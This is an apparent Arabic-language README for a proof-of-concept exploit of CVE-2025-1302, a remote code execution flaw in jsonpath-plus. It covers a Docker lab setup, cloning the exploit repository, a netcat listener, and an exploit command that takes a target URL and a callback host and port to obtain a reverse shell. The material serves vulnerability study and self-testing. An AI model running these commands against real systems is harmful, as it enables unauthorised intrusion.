
JSONPath-plus تنفيذ التعليمات البرمجية عن بُعد
★ CVE-2025-1302 JSONPath-plus RCE PoC ★
https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
localhost:3000

إصدارات الحزمة jsonpath-plus قبل 10.3.0 معرّضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) بسبب عدم كفاية تنقية المدخلات. يمكن للمهاجم تنفيذ تعليمات برمجية عشوائية على النظام من خلال استغلال الاستخدام الافتراضي غير الآمن لوضع eval='safe'. ملاحظة: سبب ذلك هو إصلاح غير مكتمل لثغرة CVE-2024-21534.
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
pip install -r requirements.txt
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>


لا يُقصد من هذا المستودع أن يكون أداة استغلال (RCE) لثغرة CVE-2025-1302. الغرض من هذا المشروع هو مساعدة الأشخاص على تعلّم هذه الثغرة، وربما اختبار تطبيقاتهم الخاصة.
ننشر تحليلات CVE والبرمجيات الخبيثة مرة واحدة شهريًا. إذا كنت مهتمًا، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا. https://www.skshieldus.com/eng/business/insight.do